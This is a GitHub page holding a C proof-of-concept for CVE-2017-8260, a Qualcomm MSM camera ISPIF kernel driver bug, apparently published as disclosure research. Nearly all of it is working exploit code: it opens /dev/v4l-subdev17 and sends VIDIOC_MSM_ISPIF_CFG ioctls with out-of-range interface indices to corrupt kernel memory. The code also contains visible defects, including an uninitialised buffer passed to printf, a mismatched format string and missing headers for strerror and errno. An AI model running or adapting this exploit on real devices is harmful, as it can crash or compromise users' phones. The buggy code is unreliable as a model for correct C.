-
Notifications
You must be signed in to change notification settings - Fork 202
/
Copy pathCVE-2017-8260.c
167 lines (141 loc) · 3.04 KB
/
CVE-2017-8260.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>
#include <strings.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
/* Poc by Scott Bauer
* Bug discoverd by Derrek!
*/
#define BASE_VIDIOC_PRIVATE 192 /* 192-255 are private */
#define CSID_VERSION_V20 0x02000011
#define CSID_VERSION_V22 0x02001000
#define CSID_VERSION_V30 0x30000000
#define CSID_VERSION_V3 0x30000000
enum msm_ispif_vfe_intf {
VFE0,
VFE1,
VFE_MAX
};
#define VFE0_MASK (1 << VFE0)
#define VFE1_MASK (1 << VFE1)
enum msm_ispif_intftype {
PIX0,
RDI0,
PIX1,
RDI1,
RDI2,
INTF_MAX
};
#define MAX_PARAM_ENTRIES (INTF_MAX * 2)
#define MAX_CID_CH 8
#define PIX0_MASK (1 << PIX0)
#define PIX1_MASK (1 << PIX1)
#define RDI0_MASK (1 << RDI0)
#define RDI1_MASK (1 << RDI1)
#define RDI2_MASK (1 << RDI2)
enum msm_ispif_vc {
VC0,
VC1,
VC2,
VC3,
VC_MAX
};
enum msm_ispif_cid {
CID0,
CID1,
CID2,
CID3,
CID4,
CID5,
CID6,
CID7,
CID8,
CID9,
CID10,
CID11,
CID12,
CID13,
CID14,
CID15,
CID_MAX
};
enum msm_ispif_csid {
CSID0,
CSID1,
CSID2,
CSID3,
CSID_MAX
};
struct msm_ispif_params_entry {
enum msm_ispif_vfe_intf vfe_intf;
enum msm_ispif_intftype intftype;
int num_cids;
enum msm_ispif_cid cids[3];
enum msm_ispif_csid csid;
int crop_enable;
uint16_t crop_start_pixel;
uint16_t crop_end_pixel;
};
struct msm_ispif_param_data {
uint32_t num;
struct msm_ispif_params_entry entries[MAX_PARAM_ENTRIES];
};
struct msm_isp_info {
uint32_t max_resolution;
uint32_t id;
uint32_t ver;
};
struct msm_ispif_vfe_info {
int num_vfe;
struct msm_isp_info info[VFE_MAX];
};
enum ispif_cfg_type_t {
ISPIF_CLK_ENABLE,
ISPIF_CLK_DISABLE,
ISPIF_INIT,
ISPIF_CFG,
ISPIF_START_FRAME_BOUNDARY,
ISPIF_RESTART_FRAME_BOUNDARY,
ISPIF_STOP_FRAME_BOUNDARY,
ISPIF_STOP_IMMEDIATELY,
ISPIF_RELEASE,
ISPIF_ENABLE_REG_DUMP,
ISPIF_SET_VFE_INFO,
};
struct ispif_cfg_data {
enum ispif_cfg_type_t cfg_type;
union {
int reg_dump; /* ISPIF_ENABLE_REG_DUMP */
uint32_t csid_version; /* ISPIF_INIT */
struct msm_ispif_vfe_info vfe_info; /* ISPIF_SET_VFE_INFO */
struct msm_ispif_param_data params; /* CFG, START, STOP */
};
};
#define VIDIOC_MSM_ISPIF_CFG \
_IOWR('V', BASE_VIDIOC_PRIVATE, struct ispif_cfg_data)
int main(void)
{
int i, fd;
char subdev[36];
struct ispif_cfg_data pcdata = { 0 };
struct ispif_cfg_data pcdata1 = { 0 };
pcdata.cfg_type = ISPIF_CFG;
pcdata.params.num = MAX_PARAM_ENTRIES - 1;
pcdata1.cfg_type = ISPIF_INIT;
pcdata1.csid_version = CSID_VERSION_V22;
for (i = 0; i < pcdata.params.num; i++)
pcdata.params.entries[i].vfe_intf = 0xFFFFF00;
fd = open("/dev/v4l-subdev17", O_RDWR);
if (fd > 0) {
printf("ioctl on %s\n", subdev);
ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &pcdata1);
ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &pcdata);
close(fd);
} else
printf("failed to open /dev/v4l-subdev17 with errno %s\n", subdev, strerror(errno));
}